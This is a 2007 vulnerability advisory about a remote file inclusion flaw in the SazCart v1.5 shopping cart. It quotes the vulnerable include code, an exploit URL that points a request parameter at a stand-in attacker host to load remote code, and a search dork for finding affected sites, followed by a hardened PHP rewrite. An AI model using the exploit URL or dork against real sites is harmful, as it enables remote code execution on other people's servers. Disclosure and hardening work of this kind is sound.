SECURITYVULNS:DOC:15672
Jan 11, 2007 - 12:00 a.m.

sazcart v1.5 (cart.php) Remote File include

--Hitamputih crew--***********

  • Bug Found By : IbnuSina
  • vendor : http://sazcart.com/site
  • Risk : High
  • Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
  • and all member hitamputih crew community

Bug found in admin/controls/cart.php:
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"
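
A hardened form of the include logic shown above, as an added example that is not SazCart's own code or a vendor patch: it refuses direct requests to the file and only includes a file whose resolved path stays inside a fixed local directory. It assumes the request parameter reaches `$_saz` through PHP's `register_globals`, which, like `allow_url_include`, should be off in php.ini; `SAZ_BOOTSTRAPPED`, `resolve_module()` and the `modules/` layout are hypothetical names.

```php
<?php
// Added example (not SazCart code): hardened include logic for a file like
// admin/controls/cart.php. SAZ_BOOTSTRAPPED, resolve_module() and the
// modules/ directory layout are hypothetical names chosen for illustration.

// 1. Refuse direct requests. The constant is assumed to be defined by the
//    application's front controller before it includes this file, so a
//    request straight to cart.php never reaches the include statements.
if (!defined('SAZ_BOOTSTRAPPED')) {
    http_response_code(403);
    exit('Direct access not permitted');
}

/**
 * Map a configured folder name to a real directory under $baseDir and
 * return the full path of $file inside it. Throws if the value is not a
 * plain folder name or if the resolved path falls outside $baseDir.
 */
function resolve_module(string $baseDir, $folder, string $file): string
{
    // Rejects arrays, URLs (scheme://), traversal (../) and null bytes.
    if (!is_string($folder) || !preg_match('/\A[A-Za-z0-9_-]+\z/', $folder)) {
        throw new RuntimeException('Invalid module folder name');
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $folder . '/' . $file);
    // realpath() returns false for files that do not exist locally.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Module file outside allowed directory');
    }
    return $path;
}

// 2. Settings must come from server-side configuration loaded by the
//    bootstrap, never from request variables.
$modules = __DIR__ . '/../../modules';   // assumed layout
require resolve_module($modules, $_saz['settings']['shippingfolder'], 'shipping.php');
$Shipping = new Shipping;
require resolve_module($modules, $_saz['settings']['taxfolder'], 'tax.php');
$Tax = new Tax;
```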